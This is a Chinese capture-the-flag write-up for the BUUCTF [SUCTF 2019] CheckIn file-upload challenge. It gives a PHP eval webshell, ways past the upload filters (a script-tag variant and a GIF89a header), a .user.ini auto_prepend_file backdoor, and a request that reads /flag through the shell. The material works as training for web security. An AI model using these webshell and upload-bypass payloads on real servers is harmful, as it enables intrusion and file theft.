BUUCTF [SUCTF 2019]CheckIn 1(user.ini文件构成的PHP后门 | 两种解法!)

题目环境:

可以看出是文件上传类的题目

绕过后缀的文件格式有php、php3、php4、php5、phtml、pht。

构造木马文件
<?php @eval($_REQUEST['shell']); ?>

这里我把文件命名为了shell.php

上传木马文件

illegal suffix!

非法后缀
将shell.php改为shell.jpg

继续上传木马文件

<? in contents! 存在违法内容"<?"
改变思路点

将PHP一句话木马转换为JS形式

重构木马文件
<script language="php">@eval($_REQUEST['shell']);</script>

继续上传

exif_imagetype:not image!

Exif _ imagetype: 不是 image!
Exif _ imagetype无法检测GIF动态图片

GIF的ASCII值是GIF89a

木马前面加GIF89a来绕过Exif _ imagetype的检测

重构
GIF89a<script language="php">@eval($_REQUEST['shell']);</script>

上传

上传成功

使用中国蚁剑测试连接

可以连接,但是返回数据是空的

猜测后台并没有解析PHP代码

访问题目源码

提示是.user.ini配置文件
这里呢,我发现.user.ini配置文件与.htaccess配置文件比较类似

概述来说,htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。

注意这几个字"改变文件扩展名"。

.htaccess配置文件格式

<FileMatch "1.jpg>

SetHandler application/x-httpd-php

那么我这里就觉得或者说是简单理解吧

.user.ini配置文件和.htaccess配置文件都是为了解析PHP代码
php.ini大家都熟悉,那么我们就可以把.user.ini理解为用户可自定义的php.ini配置文件
官方给的解释

两个比较有意思的东西

而这两个就是.user.ini中的两个配置项

auto_prepend_file是在文件前插入

auto_append_file是在文件最后才插入

创建.user.ini文件

GIF89a

auto_prepend_file=shell.jpg

上传.user.ini文件

访问路径文件
[http://ac513c0d-afdf-4e89-920a-93eedd63102d.node4.buuoj.cn:81/uploads/c55e0cb61f7eb238df09ae30a206e5ee/index.php](http://ac513c0d-afdf-4e89-920a-93eedd63102d.node4.buuoj.cn:81/uploads/c55e0cb61f7eb238df09ae30a206e5ee/index.php)

回显GIF89a就代表解析成功了

这里解释一下为什么index.php主文件在最后面

因为我们使用的是auto_prepend_file,在主文件之前就已经自动解析文件名了,所以index.php主文件在最后面。

第一种解法:PHP内部命令

var_dump() 函数用于输出变量的相关信息。

file_get_contents() 函数把整个文件读入一个字符串中。

构造payload
[http://19ff03ff-93cb-4b33-94ec-95a79619b92a.node4.buuoj.cn:81/uploads/c55e0cb61f7eb238df09ae30a206e5ee/index.php](http://19ff03ff-93cb-4b33-94ec-95a79619b92a.node4.buuoj.cn:81/uploads/c55e0cb61f7eb238df09ae30a206e5ee/index.php)?shell=var_dump(file_get_contents("/flag"));

上传payload

得到flag
flag{4f105e98-c110-4b71-9160-545aa8e7131e}
第二种解法:中国蚁剑
http://2d9647e6-425e-4d7f-bb6a-116f0f51bfc8.node4.buuoj.cn:81/uploads/c55e0cb61f7eb238df09ae30a206e5ee/index.php

注:中国蚁剑连接密码就是PHP一句话木马里面的参数

我这里是shell


得到flag:
flag{8f943f63-53c9-4395-9f91-d28052e52d55}

这两种方法测试完,我发现,上传木马后有时间限制,过一段时间木马就会失效,还有试过一种方法,再试另一种方法木马也会失效;只需要重新开启题目环境即可,最后,做这道题的步骤是,先上传.user.ini配置文件,再去上传PHP一句话木马文件。

相关推荐
eybk16 小时前
局域网文件传输器安卓版本+win版本
android·python
天涯路s16 小时前
qt怎么自定义日志
开发语言·qt
未来猫咪花16 小时前
LiveData "数据倒灌":一个流行的错误概念
android·android jetpack
Evand J16 小时前
【自适应IMM】MATLAB编写的创新多模型,基于CA/CT双模型和观测自适应。二维平面目标位置估计,带误差统计特性输出,附代码下载链接
开发语言·matlab·ekf·imm·交互式多模型
我命由我1234516 小时前
微信小程序 - scroll-view 的一些要点(scroll-view 需要设置滚动方向、scroll-view 需要设置高度)
开发语言·前端·javascript·微信小程序·小程序·前端框架·js
7哥♡ۣۖᝰꫛꫀꪝۣℋ16 小时前
Spring IoC&DI
java·开发语言·mysql
孫治AllenSun16 小时前
【Doris】运维命令
运维·服务器·网络
wadesir16 小时前
Go语言反射之结构体的深比较(详解reflect.DeepEqual在结构体比较中的应用)
开发语言·后端·golang
2501_9371549316 小时前
神马影视 8.8 源码:1.5 秒加载 + 双系统部署
android·源码·源代码管理·机顶盒
渲吧-云渲染16 小时前
PDM部署革新:SaaS化转型与安全新挑战
安全·pdm